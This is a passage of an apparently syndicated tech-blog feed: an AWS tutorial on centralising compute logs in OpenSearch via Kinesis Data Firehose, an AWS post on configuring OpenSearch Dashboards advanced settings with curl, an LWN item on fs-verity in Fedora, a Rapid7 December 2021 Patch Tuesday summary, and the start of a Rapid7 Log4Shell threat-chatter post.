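"containerDefinitions": [
  {
    "name": "log_router",
    "image": "public.ecr.aws/aws-observability/aws-for-fluent-bit:stable",
    "essential": true,
    "firelensConfiguration": { "type": "fluentbit" }
  },
  {
    "name": "httpd",
    "image": "httpd:2.4",
    "essential": true,
    "logConfiguration": {
      "logDriver": "awsfirelens",
      "options": {
        "Name": "firehose",
        "region": "us-east-1",
        "delivery_stream": "ecs-logs-delivery-stream"
      }
    }
  }
]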

Amazon EKS

With the recent announcement of Fluent Bit support for Amazon EKS, you no longer need to run a sidecar to route container logs from Amazon EKS pods running on Fargate. With the new built-in logging support, you can select a destination of your choice to send the records to. Amazon EKS on Fargate uses a version of Fluent Bit for AWS, an upstream conformant distribution of Fluent Bit managed by AWS.

BDB-1742-EKS

The AWS CDK script provided as part of this solution deploys an NGINX container hosted behind an internal Application Load Balancer. The NGINX container logs are pushed to Kinesis Data Firehose (eks-logs-delivery-stream) through the Fluent Bit plugin.
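With Fargate logging, the Fluent Bit output is declared in a ConfigMap named aws-logging in the aws-observability namespace rather than in the pod spec. A minimal sketch pointing it at the delivery stream could look like the following; the Region is an assumption and the stream name is taken from the stack above:

apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-logging
  namespace: aws-observability
data:
  output.conf: |
    [OUTPUT]
        Name kinesis_firehose
        Match *
        region us-east-1
        delivery_stream eks-logs-delivery-stream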

Lambda

For Lambda functions, you can send logs directly to Kinesis Data Firehose using the Lambda extension, and you can optionally prevent the records from also being written to Amazon CloudWatch.

BDB-1742-Lambda

After deployment, the workflow is as follows:

  1. On startup, the extension subscribes to receive logs for the platform and function events. A local HTTP server is started inside the external extension, which receives the logs.
  2. The extension buffers the log events in a synchronized queue and writes them to Kinesis Data Firehose via PUT records.
  3. The logs are sent to downstream systems.
  4. The logs are sent to Amazon OpenSearch Service.

The Firehose delivery stream name gets specified as an environment variable (AWS_KINESIS_STREAM_NAME).

For this solution, because we’re only focusing on collecting the run logs of the Lambda function, the data transformer of the Kinesis Data Firehose delivery stream filters out the records of type function ("type":"function") before sending it to Amazon OpenSearch Service.

The following is a sample input for the data transformer:

[
   {
      "time":"2021-07-29T19:54:08.949Z",
      "type":"platform.start",
      "record":{
         "requestId":"024ae572-72c7-44e0-90f5-3f002a1df3f2",
         "version":"$LATEST"
      }
   },
   {
      "time":"2021-07-29T19:54:09.094Z",
      "type":"platform.logsSubscription",
      "record":{
         "name":"kinesisfirehose-logs-extension-demo",
         "state":"Subscribed",
         "types":[
            "platform",
            "function"
         ]
      }
   },
   {
      "time":"2021-07-29T19:54:09.096Z",
      "type":"function",
      "record":"2021-07-29T19:54:09.094Z\tundefined\tINFO\tLoading function\n"
   },
   {
      "time":"2021-07-29T19:54:09.096Z",
      "type":"platform.extension",
      "record":{
         "name":"kinesisfirehose-logs-extension-demo",
         "state":"Ready",
         "events":[
            "INVOKE",
            "SHUTDOWN"
         ]
      }
   },
   {
      "time":"2021-07-29T19:54:09.097Z",
      "type":"function",
      "record":"2021-07-29T19:54:09.097Z\t024ae572-72c7-44e0-90f5-3f002a1df3f2\tINFO\tvalue1 = value1\n"
   },   
   {
      "time":"2021-07-29T19:54:09.098Z",
      "type":"platform.runtimeDone",
      "record":{
         "requestId":"024ae572-72c7-44e0-90f5-3f002a1df3f2",
         "status":"success"
      }
   }
]
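A transformation function with that filtering behavior could be sketched as follows; it decodes the batched entries, keeps only the function log lines, and wraps them in the same JSON document shape used earlier. This is an illustration, not the exact transformer deployed by the stack:

import base64
import json

def handler(event, context):
    output = []
    for record in event['records']:
        entries = json.loads(base64.b64decode(record['data']))
        # Keep only the run logs emitted by the function itself
        function_logs = [e['record'] for e in entries if e.get('type') == 'function']
        if function_logs:
            payload = json.dumps({'logs': '\n'.join(function_logs)}) + '\n'
            output.append({
                'recordId': record['recordId'],
                'result': 'Ok',
                'data': base64.b64encode(payload.encode('utf-8')).decode('utf-8'),
            })
        else:
            # Nothing to index for this record, so drop it
            output.append({
                'recordId': record['recordId'],
                'result': 'Dropped',
                'data': record['data'],
            })
    return {'records': output}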

Prerequisites

To implement this solution, you need the following prerequisites:

Build the code

Check out the AWS CDK code by running the following command:

mkdir unified-logs && cd unified-logs
git clone https://github.com/aws-samples/unified-log-aggregation-and-analytics .

Build the lambda extension by running the following command:

cd lib/computes/lambda/extensions
chmod +x extension.sh
./extension.sh
cd ../../../../

Make sure to replace the default AWS Region specified as the value of the firehose.endpoint attribute inside lib/computes/ec2/ec2-startup.sh.

Build the code by running the following command:

yarn install && npm run build

Deploy the code

If you’re running AWS CDK for the first time, run the following command to bootstrap the AWS CDK environment (provide your AWS account ID and AWS Region):

cdk bootstrap \
    --cloudformation-execution-policies arn:aws:iam::aws:policy/AdministratorAccess \
    aws://<AWS Account Id>/<AWS_REGION>

You only need to bootstrap the AWS CDK one time (skip this step if you have already done this).

Run the following command to deploy the code:

cdk deploy --require-approval never

You get the following output:

 ✅  CdkUnifiedLogStack

Outputs:
CdkUnifiedLogStack.ec2ipaddress = xx.xx.xx.xx
CdkUnifiedLogStack.ecsloadbalancerurl = CdkUn-ecsse-PY4D8DVQLK5H-xxxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.ecsserviceLoadBalancerDNS570CB744 = CdkUn-ecsse-PY4D8DVQLK5H-xxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.ecsserviceServiceURL88A7B1EE = http://CdkUn-ecsse-PY4D8DVQLK5H-xxxx.us-east-1.elb.amazonaws.com
CdkUnifiedLogStack.eksclusterClusterNameCE21A0DB = ekscluster92983EFB-d29892f99efc4419bc08534a3d253160
CdkUnifiedLogStack.eksclusterConfigCommand515C0544 = aws eks update-kubeconfig --name ekscluster92983EFB-d29892f99efc4419bc08534a3d253160 --region us-east-1 --role-arn arn:aws:iam::xxx:role/CdkUnifiedLogStack-clustermasterroleCD184EDB-12U2TZHS28DW4
CdkUnifiedLogStack.eksclusterGetTokenCommand3C33A2A5 = aws eks get-token --cluster-name ekscluster92983EFB-d29892f99efc4419bc08534a3d253160 --region us-east-1 --role-arn arn:aws:iam::xxx:role/CdkUnifiedLogStack-clustermasterroleCD184EDB-12U2TZHS28DW4
CdkUnifiedLogStack.elasticdomainarn = arn:aws:es:us-east-1:xxx:domain/cdkunif-elasti-rkiuv6bc52rp
CdkUnifiedLogStack.s3bucketname = cdkunifiedlogstack-logsfailederrcapturebucket0bcc-xxxxx
CdkUnifiedLogStack.samplelambdafunction = CdkUnifiedLogStack-LambdatransformerfunctionFA3659-c8u392491FrW

Stack ARN:
arn:aws:cloudformation:us-east-1:xxxx:stack/CdkUnifiedLogStack/6d53ef40-efd2-11eb-9a9d-1230a5204572

AWS CDK takes care of building the required infrastructure, deploying the sample application, and collecting logs from different sources to Amazon OpenSearch Service.

The following is some of the key information about the stack:

  • ec2ipaddress – The public IP address of the EC2 instance, deployed with the sample PHP application
  • ecsloadbalancerurl – The URL of the Amazon ECS Load Balancer, deployed with the httpd application
  • eksclusterClusterNameCE21A0DB – The Amazon EKS cluster name, deployed with the NGINX application
  • samplelambdafunction – The sample Lambda function using the Lambda extension to send logs to Kinesis Data Firehose
  • elasticdomainarn – The ARN of the Amazon OpenSearch Service domain

Generate logs

To visualize the logs, you first need to generate some sample logs.

  1. To generate Lambda logs, invoke the function using the following AWS CLI command (run it a few times):
aws lambda invoke \
--function-name "<<samplelambdafunction>>" \
--payload '{"payload": "hello"}' /tmp/invoke-result \
--cli-binary-format raw-in-base64-out \
--log-type Tail

Make sure to replace samplelambdafunction with the actual Lambda function name. The file path needs to be updated based on the underlying operating system.

The function should return "StatusCode": 200, with the following output:

{
    "StatusCode": 200,
    "LogResult": "<<Encoded>>",
    "ExecutedVersion": "$LATEST"
}
  2. Run the following command a couple of times to generate Amazon EC2 logs:
curl http://ec2ipaddress:80

Make sure to replace ec2ipaddress with the public IP address of the EC2 instance.

  3. Run the following command a couple of times to generate Amazon ECS logs:
curl http://ecsloadbalancerurl:80

Make sure to replace ecsloadbalancerurl with the DNS name of the Application Load Balancer (the ecsloadbalancerurl value in the stack output).

We deployed the NGINX application with an internal load balancer, so the load balancer hits the health checkpoint of the application, which is sufficient to generate the Amazon EKS access logs.

Visualize the logs

To visualize the logs, complete the following steps:

  1. On the Amazon OpenSearch Service console, choose the hyperlink provided for the OpenSearch Dashboards URL.
  2. Configure access to the OpenSearch Dashboards.
  3. Under OpenSearch Dashboards, on the Discover menu, start creating a new index pattern for each compute log.

We can see separate indexes for each compute log partitioned by date, as in the following screenshot.

BDB-1742-create-index

The following screenshot shows the process to create index patterns for Amazon EC2 logs.

BDB-1742-ec2

After you create the index patterns, you can start analyzing the logs using the Discover menu under OpenSearch Dashboards in the navigation pane. This tool provides a single searchable and unified interface for all the records across the various compute platforms. You can switch between different logs using the Change index pattern submenu.

BDB-1742-unified

Clean up

Run the following command from the root directory to delete the stack:

cdk destroy

Conclusion

In this post, we showed how to unify and centralize logs across different compute platforms using Kinesis Data Firehose and Amazon OpenSearch Service. This approach allows you to analyze logs quickly and identify the root cause of failures, using a single platform rather than different platforms for different services.

If you have feedback about this post, submit your comments in the comments section.

Resources

For more information, see the following resources:


About the author

Hari Ohm Prasath is a Senior Modernization Architect at AWS, helping customers with their modernization journey to become cloud native. Hari loves to code and actively contributes to open source initiatives. You can find him on Medium, GitHub, and Twitter @hariohmprasath.

Ballu Singh is a Principal Solutions Architect at AWS. He lives in the San Francisco Bay Area and helps customers architect and optimize applications on AWS. In his spare time, he enjoys reading and spending time with his family.

Set advanced settings with the Amazon OpenSearch Service Dashboards API

Post Syndicated from Prashant Agrawal original https://aws.amazon.com/blogs/big-data/set-advanced-settings-with-the-amazon-opensearch-service-dashboards-api/

Amazon OpenSearch Service (successor to Amazon Elasticsearch Service) is a fully managed service that you can use to deploy and operate OpenSearch clusters cost-effectively at scale in the AWS Cloud. The service makes it easy for you to perform interactive log analytics, real-time application monitoring, website search, and more by offering the latest versions of OpenSearch, support for 19 versions of Elasticsearch (versions 1.5 to 7.10), and visualization capabilities powered by OpenSearch Dashboards and Kibana (versions 1.5 to 7.10).

A common use case of OpenSearch in multi-tenant environments is to use tenants in OpenSearch Dashboards and provide segregated index patterns, dashboards, and visualizations to different teams in the organization. Tenants in OpenSearch Dashboards aren’t the same as indexes, where OpenSearch organizes all data. You may still have multiple indexes for multi-tenancy and tenants for controlling access to OpenSearch Dashboards’ saved objects.

In this post, we focus on operationalizing advanced settings for OpenSearch Dashboards tenants programmatically, in particular with the Dashboards Advanced Settings API. For a deeper insight into multi-tenancy in OpenSearch, refer to OpenSearch Dashboards multi-tenancy.

One example of advanced settings configurations is deploying time zone settings in an environment where each tenant is aligned to a different geographic area with a specific time zone. We explain the time zone configuration with the UI and demonstrate configuring it with the OpenSearch Dashboards Advanced Settings API using curl. This post also provides guidance for other advanced settings you may wish to include in your deployment.

To follow along in this post, make sure you have an Amazon OpenSearch Service domain with access to OpenSearch Dashboards through a role with administrator privileges for the domain. For more information about enabling access control mechanisms for your domains, see Fine-grained access control in Amazon OpenSearch Service.

The following examples use Amazon OpenSearch Service version 1.0, which was the latest release at the time of writing.

Configure advanced settings in the OpenSearch Dashboards UI

To configure advanced settings via the OpenSearch Dashboards UI, complete the following steps:

  1. Log in to OpenSearch Dashboards.
  2. Choose your user icon and choose Switch Tenants to choose the tenant you want to change configuration for.

By default, all OpenSearch Dashboards users have access to two tenants: private and global. The global tenant is shared between every OpenSearch Dashboards user. The private tenant is exclusive to each user and used mostly for experimenting before publishing configuration to other tenants. Make sure to check your configurations in the private tenant before replicating in other tenants, including global.

  3. Choose Stack Management in the navigation pane, then choose Advanced Settings.
  4. In your desired tenant context, choose a value for Timezone for date formatting.

In this example, we change the time zone from the default selection Browser to US/Eastern.

  5. Choose Save changes.

Configure advanced settings with the OpenSearch Dashboards API

For environments where you prefer to perform operations programmatically, Amazon OpenSearch Service provides the ability to configure advanced settings with the OpenSearch Dashboards advanced settings API.

Let’s walk through configuring the time zone using curl.

  1. First, you need to authenticate to the API endpoint with your user name and password, and retrieve the authorization cookies into the file auth.txt:
curl -X POST  https://<domain_endpoint>/_dashboards/auth/login \
-H "osd-xsrf: true" \
-H "content-type:application/json" \
-d '{"username":"<username>", "password":"<password>"}' \
-c auth.txt

In this example, we configure OpenSearch Dashboards to use the internal user database, and the user inherits administrative permissions under the global tenant. In multi-tenant environments, the user is required to have relevant tenant permissions. You can see an example of this in the next section, where we illustrate a multi-tenant environment. Access control in OpenSearch Dashboards is a broad and important topic, and it would be unfair to try to squeeze all of it in this post. Therefore, we don’t cover access control in depth here. For additional information on access control in multi-tenant OpenSearch Dashboards, refer to OpenSearch Dashboards multi-tenancy.

The auth.txt file holds authorization cookies that you use to pass configuration changes to the API endpoint. The auth.txt file should look similar to the following code:

# Netscape HTTP Cookie File
# https://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

#HttpOnly_<domain_endpoint> FALSE   /_dashboards    TRUE    0       security_authentication Fe26.2**80fca234dd0974fb6dfe9427e6b8362ba1dd78fc5a71
e7f9803694f40980012b*k9QboTT5A24hs71_wN32Cw*9-RvY2UhS-Cmat4RZPHohTbczyGRjmHezlIlhwePG1gv_P2bgSuZhx9XBV9I-zzdxrZIbJTTpymy4mv1rAB_GRuXjt-6ITUfsG58GrI7TI7D3pWKaw8n6lrhamccGYqL9K_dQrE4kr_godwEDLydR1d_
Oc11jEG98yi_O0qhBTu1kDNzNAEqgXEoaLS--afnbwPS0zvqUc4MUgrfGQOTt7mUoWMC778Tpii4V4gxhAcRqe_KoYQG1LhUq-j9XTHCouzB4qTJ8gR3tlbVYMFwhA**f278b1c9f2c9e4f50924c47bfd1a992234400c6f11ee6f005beecc4201760998*3Aj8gQAIKKPoUR0PX-5doFgZ9zqxlcB3YbfDgJIBNLU
  2. Construct configuration changes within the curl body and submit them using an authorization cookie. In this example, we include a sample to modify the time zone to US/Eastern.
curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-d '{"attributes":{"dateFormat:tz":"US/Eastern"}}' \
-b auth.txt

By default, the constructed API modifies the configuration in the private tenant, which is exclusive to each user, can’t be shared, and is ideal for testing. We provide instructions to modify configuration in multi-tenant environments later in the post.

Your API call should receive a response similar to the following code, indicating the changes you submitted:

{"id":"1.0.0-SNAPSHOT","type":"config","updated_at":"2021-09-06T19:59:42.425Z","version":"WzcsMV0=","namespaces":["default"],"attributes":{"dateFormat:tz":"US/Eastern"}}

If you prefer to make multiple changes, you can construct the API call as follows:

curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-d \
'{
    "attributes":{
      "dateFormat:tz":"US/Eastern",
      "dateFormat:dow":"Monday"
    }
 }' \
-b auth.txt

To retrieve the latest configuration changes, construct a GET request as follows:

curl -X GET https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-b auth.txt

Configure advanced settings with the OpenSearch Dashboards API in multi-tenant environments

Tenants in OpenSearch Dashboards are commonly used to share custom index patterns, visualizations, dashboards, and other OpenSearch objects with different teams or organizations.

The OpenSearch Dashboards API provides the ability to modify advanced settings in different tenants. In the previous section, we covered making advanced configuration changes for a private tenant. We now walk through a similar scenario for multiple tenants.

  1. First, you need to authenticate to the API endpoint and retrieve the authorization cookies into the file auth.txt. You can construct this request in the same way you would in a single-tenant environment as described in the previous section.

In multi-tenant environments, make sure you configure the user’s role with relevant tenant permissions. One pattern is to associate the user to the kibana_user and a custom group that has tenant permissions. In our example, we associated the tenant admin user tenant-a_admin_user to the two roles as shown in the following code: the kibana_user system role and a custom tenant-a_admin_role that includes tenant permissions.

GET _plugins/_security/api/account
{
  "user_name" : "tenant-a_admin_user",
  "is_reserved" : false,
  "is_hidden" : false,
  "is_internal_user" : true,
  "user_requested_tenant" : "tenant-a",
  "backend_roles" : [
    ""
  ],
  "custom_attribute_names" : [ ],
  "tenants" : {
    "global_tenant" : true,
    "tenant-a_admin_user" : true,
    "tenant-a" : true
  },
  "roles" : [
    "tenant-a_admin_role",
    "kibana_user"
  ]
}


GET _plugins/_security/api/roles/tenant-a_admin_role
{
  "tenant-a_admin_role" : {
    "reserved" : false,
    "hidden" : false,
    "cluster_permissions" : [ ],
    "index_permissions" : [ ],
    "tenant_permissions" : [
      {
        "tenant_patterns" : [
          "tenant-a"
        ],
        "allowed_actions" : [
          "kibana_all_write"
        ]
      }
    ],
    "static" : false
  }
}

After authenticating to the OpenSearch Dashboards API, the auth.txt file holds authorization cookies that you use to pass configuration changes to the API endpoint. The content of the auth.txt file should be similar to the one we illustrated in the previous section.

  2. Construct the configuration changes by adding a securitytenant header. In this example, we modify the time zone and day of week in tenant-a:
curl -X PUT https://<domain_endpoint>/_dashboards/api/saved_objects/config/1.0.0-SNAPSHOT \
-H "osd-xsrf:true" \
-H "content-type:application/json" \
-H "securitytenant: tenant-a" \
-d \
'{
    "attributes":{
     "dateFormat:tz":"US/Eastern",
     "dateFormat:dow":"Monday"
    }
 }' \
-b auth.txt

The OpenSearch Dashboards API endpoint returns a response similar to the following:

{"id":"1.0.0-SNAPSHOT","type":"config","updated_at":"2021-10-10T17:41:47.249Z","version":"WzEsMV0=","namespaces":["default"],"attributes":{"dateFormat:tz":"US/Eastern","dateFormat:dow":"Monday"}}

You could also verify the configuration changes in the OpenSearch Dashboards UI, as shown in the following screenshot.

Conclusion

In this post, you used the Amazon OpenSearch Service Dashboards UI and API to configure advanced settings for a single-tenant and multi-tenant environment. Implementing OpenSearch Dashboards at scale in multi-tenant environments requires more efficient methods than simply using the UI. This is especially important in environments where you serve centralized logging and monitoring domains for different teams. You can use the OpenSearch Dashboards APIs we illustrated in this post and bake your advanced setting configurations into your infrastructure code to accelerate your deployments!

Let us know about your questions and other topics you’d like us to cover in the comment section.


About the Authors

Prashant Agrawal is a Specialist Solutions Architect at Amazon Web Services based in Seattle, WA. Prashant works closely with the Amazon OpenSearch team, helping customers migrate their workloads to the AWS Cloud. Before joining AWS, Prashant helped various customers use Elasticsearch for their search and analytics use cases.

Evren Sen is a Solutions Architect at AWS, focusing on strategic financial services customers. He helps his customers create their Cloud Center of Excellence and design and deploy solutions on the AWS Cloud. Outside of AWS, Evren enjoys spending time with family and friends, traveling, and cycling.

[$] Adding fs-verity support for Fedora 36?

Post Syndicated from original https://lwn.net/Articles/878281/rss

Adding fs-verity file-integrity information
to RPM packages for Fedora 36 is the
topic of a recent discussion on the Fedora devel mailing list. The feature
would provide a means to install files from RPM packages as read-only files
that cannot be read or otherwise operated on if the data in the files changes
at any point. The proposal is mostly about making the plumbing available
for use cases that are not particularly clear—which has led to some
questions and skepticism among those participating in the thread.

Patch Tuesday – December 2021

Post Syndicated from Greg Wiseman original https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/

Patch Tuesday - December 2021

This month’s Patch Tuesday comes in the middle of a global effort to mitigate Apache Log4j CVE-2021-44228. In today’s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products — including a fix for Windows Defender for IoT, which is vulnerable to CVE-2021-44228 amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month’s release is CVE-2021-43890, a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.

Interestingly, this round of fixes also includes CVE-2021-43883, a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there’s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for a zero-day vulnerability that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7’s vulnerability research team did a full root cause analysis of the bug as attacks ramped up in November.

As usual, RCE flaws figure prominently in the “Critical”-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. Past that, put critical server-side and OS RCE patches at the top of your list, and we’d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating.

Summary charts

Patch Tuesday - December 2021
Patch Tuesday - December 2021
Patch Tuesday - December 2021
Patch Tuesday - December 2021

Summary tables

Apps Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43890 Windows AppX Installer Spoofing Vulnerability Yes Yes 7.1 Yes
CVE-2021-43905 Microsoft Office app Remote Code Execution Vulnerability No No 9.6 Yes

Browser Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-4068 Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page No No N/A Yes
CVE-2021-4067 Chromium: CVE-2021-4067 Use after free in window manager No No N/A Yes
CVE-2021-4066 Chromium: CVE-2021-4066 Integer underflow in ANGLE No No N/A Yes
CVE-2021-4065 Chromium: CVE-2021-4065 Use after free in autofill No No N/A Yes
CVE-2021-4064 Chromium: CVE-2021-4064 Use after free in screen capture No No N/A Yes
CVE-2021-4063 Chromium: CVE-2021-4063 Use after free in developer tools No No N/A Yes
CVE-2021-4062 Chromium: CVE-2021-4062 Heap buffer overflow in BFCache No No N/A Yes
CVE-2021-4061 Chromium: CVE-2021-4061 Type Confusion in V8 No No N/A Yes
CVE-2021-4059 Chromium: CVE-2021-4059 Insufficient data validation in loader No No N/A Yes
CVE-2021-4058 Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE No No N/A Yes
CVE-2021-4057 Chromium: CVE-2021-4057 Use after free in file API No No N/A Yes
CVE-2021-4056 Chromium: CVE-2021-4056: Type Confusion in loader No No N/A Yes
CVE-2021-4055 Chromium: CVE-2021-4055 Heap buffer overflow in extensions No No N/A Yes
CVE-2021-4054 Chromium: CVE-2021-4054 Incorrect security UI in autofill No No N/A Yes
CVE-2021-4053 Chromium: CVE-2021-4053 Use after free in UI No No N/A Yes
CVE-2021-4052 Chromium: CVE-2021-4052 Use after free in web apps No No N/A Yes

Developer Tools Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43907 Visual Studio Code WSL Extension Remote Code Execution Vulnerability No No 9.8 No
CVE-2021-43908 Visual Studio Code Spoofing Vulnerability No No N/A No
CVE-2021-43891 Visual Studio Code Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43896 Microsoft PowerShell Spoofing Vulnerability No No 5.5 No
CVE-2021-43892 Microsoft BizTalk ESB Toolkit Spoofing Vulnerability No No 7.4 No
CVE-2021-43225 Bot Framework SDK Remote Code Execution Vulnerability No No 7.5 No
CVE-2021-43877 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability No No 7.8 No

Device Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability No No 9.8 Yes

Microsoft Office Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-42295 Visual Basic for Applications Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-42320 Microsoft SharePoint Server Spoofing Vulnerability No No 8 Yes
CVE-2021-43242 Microsoft SharePoint Server Spoofing Vulnerability No No 7.6 No
CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42294 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 7.2 Yes
CVE-2021-43255 Microsoft Office Trust Center Spoofing Vulnerability No No 5.5 Yes
CVE-2021-43875 Microsoft Office Graphics Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-42293 Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability No No 6.5 Yes
CVE-2021-43256 Microsoft Excel Remote Code Execution Vulnerability No No 7.8 Yes

System Center Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43882 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 9 Yes
CVE-2021-42311 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42313 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42314 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42315 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-41365 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.8 Yes
CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 8.1 Yes
CVE-2021-43889 Microsoft Defender for IoT Remote Code Execution Vulnerability No No 7.2 Yes
CVE-2021-43888 Microsoft Defender for IoT Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-42312 Microsoft Defender for IOT Elevation of Privilege Vulnerability No No 7.8 Yes

Windows Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43247 Windows TCP/IP Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43239 Windows Recovery Environment Agent Elevation of Privilege Vulnerability No No 7.1 No
CVE-2021-43231 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43880 Windows Mobile Device Management Elevation of Privilege Vulnerability No Yes 5.5 Yes
CVE-2021-43244 Windows Kernel Information Disclosure Vulnerability No No 6.5 Yes
CVE-2021-43246 Windows Hyper-V Denial of Service Vulnerability No No 5.6 No
CVE-2021-43232 Windows Event Tracing Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43248 Windows Digital Media Receiver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43214 Web Media Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-43243 VP9 Video Extensions Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43228 SymCrypt Denial of Service Vulnerability No No 7.5 No
CVE-2021-43227 Storage Spaces Controller Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43235 Storage Spaces Controller Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43240 NTFS Set Short Name Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-40452 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-40453 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-41360 HEVC Video Extensions Remote Code Execution Vulnerability No No 7.8 Yes
CVE-2021-43219 DirectX Graphics Kernel File Denial of Service Vulnerability No No 7.4 No

Windows ESU Vulnerabilities

CVE Vulnerability Title Exploited Publicly Disclosed? CVSSv3 Has FAQ?
CVE-2021-43215 iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution No No 9.8 Yes
CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43223 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-41333 Windows Print Spooler Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-43229 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43230 Windows NTFS Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-40441 Windows Media Center Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43883 Windows Installer Elevation of Privilege Vulnerability No Yes 7.8 No
CVE-2021-43234 Windows Fax Service Remote Code Execution Vulnerability No No 7.8 No
CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution Vulnerability No No 8.1 Yes
CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability No Yes 7.5 No
CVE-2021-43245 Windows Digital TV Tuner Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43224 Windows Common Log File System Driver Information Disclosure Vulnerability No No 5.5 Yes
CVE-2021-43226 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43207 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8 No
CVE-2021-43233 Remote Desktop Client Remote Code Execution Vulnerability No No 7.5 No
CVE-2021-43222 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-43236 Microsoft Message Queuing Information Disclosure Vulnerability No No 7.5 Yes
CVE-2021-43216 Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability No No 6.5 Yes

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

It’s been a long few days as organizations’ security teams have worked to map, quantify, and mitigate the immense risk presented by the Log4Shell vulnerability within Log4j. As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.

Need clarity on detecting and mitigating Log4Shell?

Sign up for our webinar on Thursday, December 16, 2021

The Rapid7 Threat Intelligence team is tracking the attacker’s-eye view and the related chatter on the clear, deep, and dark web within our Threat Intelligence platform. Here are 4 observations based on what we’ve seen at the onset of the identification of CVE-2021-44228.

1. We see a spike in hacker chatter and security researchers’ publications about Log4j.

